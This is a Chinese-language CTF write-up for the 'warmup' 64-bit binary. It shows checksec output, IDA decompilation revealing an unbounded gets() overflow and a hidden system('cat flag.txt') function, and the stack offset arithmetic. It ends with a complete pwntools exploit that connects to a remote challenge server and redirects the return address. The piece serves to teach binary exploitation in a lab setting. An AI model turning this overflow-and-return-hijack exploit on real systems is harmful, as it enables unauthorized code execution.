warm up

0x01 寻找漏洞

xfgg@ubuntu:~/Downloads$ checksec warmup

[*] '/home/xfgg/Downloads/warmup'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
checksec 显示该二进制没有开启任何缓解措施：没有栈 canary，NX 是 disabled（栈可执行，且存在 RWX 段），也没有 PIE（固定加载在 0x400000，代码地址不会变）。注意这里不是"只开启了 NX"——checksec 明确写的是 NX disabled。

ida分析

/* Decompiled main() of the target binary (IDA output, kept verbatim).
 * Frame layout from the stack view below: s at rbp-0x80, v5 at rbp-0x40,
 * saved rbp at rbp, return address at rbp+8. */
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
char s; // [rsp+0h] [rbp-80h]  -- 0x40 bytes below v5; receives the "%p\n" text
char v5; // [rsp+40h] [rbp-40h] -- unbounded gets() target: 0x40 bytes reach the saved rbp, 0x48 reach the return address

write(1, "-Warm Up-\n", 0xAuLL);
write(1, "WOW:", 4uLL);
sprintf(&s, "%p\n", sub_40060D); // prints the address of sub_40060D; with No PIE it is the fixed 0x40060D anyway
write(1, &s, 9uLL);
write(1, ">", 1uLL);
return gets(&v5, ">"); // no length bound: this is the stack overflow. The second argument is presumably a decompiler artifact (libc gets() takes one) -- verify in the disassembly
}

gets(&v5, ">")：gets 不限制读入长度，写入 v5 时会一直覆盖到保存的 rbp 和返回地址，这就是栈溢出漏洞。（IDA 显示了第二个参数，libc 的 gets 实际只接收一个参数，应为反编译伪影。）

/* Target of the overflow: point main()'s return address here and the
 * process runs `cat flag.txt`. main() only prints this address via
 * sprintf and never calls it, so it is reachable only by hijacking
 * control flow. Address 0x40060D is fixed (No PIE). */
int sub_40060D()
{
return system("cat flag.txt"); // shell out; the flag is printed to stdout
}

sub_40060D 是目标函数：它调用 system("cat flag.txt")，直接输出 flag。main 只用 sprintf 打印了它的地址，从不调用它，所以需要把返回地址劫持到 0x40060D。

-0000000000000040 var_40 db ?
-000000000000003F db ? ; undefined
-000000000000003E db ? ; undefined
-000000000000003D db ? ; undefined
-000000000000003C db ? ; undefined
-000000000000003B db ? ; undefined
-000000000000003A db ? ; undefined
-0000000000000039 db ? ; undefined
-0000000000000038 db ? ; undefined
-0000000000000037 db ? ; undefined
-0000000000000036 db ? ; undefined
-0000000000000035 db ? ; undefined
-0000000000000034 db ? ; undefined

+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)

v5 位于 rbp-0x40：从 v5 开始填充 0x40 字节到达保存的 rbp，再加 8 字节覆盖 rbp 本身，共 0x48 字节；紧接着的 8 字节就是 main 的返回地址（rbp+8）。所以准确说法不是"覆盖 v5"，而是写 0x48 字节填充后再写目标地址，覆盖返回地址。

0x02 思路分析

利用 gets 的栈溢出，从 v5 开始写入 0x48 字节填充，再把 main 的返回地址覆盖为 sub_40060D 的地址 0x40060D（该函数调用 system("cat flag.txt")）。由于没有 PIE，这个地址是固定的，程序打印出的 "WOW:" 地址也可以用来核对。

0x03 攻击

非常简单的 64 位栈溢出：不需要泄露，也不需要 ROP 链。如果远程在 system 内部崩溃（SIGSEGV），通常是 64 位栈对齐问题——直接 ret 到函数入口时 rsp 未按 16 字节对齐，可在目标地址前再放一个 ret gadget 的地址。

exp

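"""Exploit for `warmup`: overflow the gets() buffer and return into sub_40060D,
which runs system("cat flag.txt")."""
import struct

# Address of sub_40060D; fixed because the binary has no PIE (checksec: No PIE (0x400000)).
sys_addr = 0x000000000040060D
# v5 is at rbp-0x40: 0x40 bytes reach the saved rbp, 8 more cover it, then comes the return address.
padding_len = 0x40 + 8


def build_payload(target=sys_addr, padding=padding_len):
    """Return the gets() input: `padding` filler bytes followed by `target` as a little-endian u64.

    Built as bytes (struct.pack, equivalent to pwntools p64) rather than str: under
    Python 3 pwntools, 'a' * n + p64(...) raises TypeError because p64() returns bytes.
    """
    return b'a' * padding + struct.pack('<Q', target)


if __name__ == '__main__':
    from pwn import remote  # imported here so build_payload() stays usable without pwntools

    p = remote('111.198.29.45', 41315)
    # Read the banner up to the ">" prompt so the payload goes straight into gets().
    p.recvuntil(b'>')
    p.sendline(build_payload())
    # NOTE(review): if the remote crashes inside system(), the stack is probably
    # 16-byte misaligned after the ret; prefix the target with a `ret` gadget address.
    p.interactive()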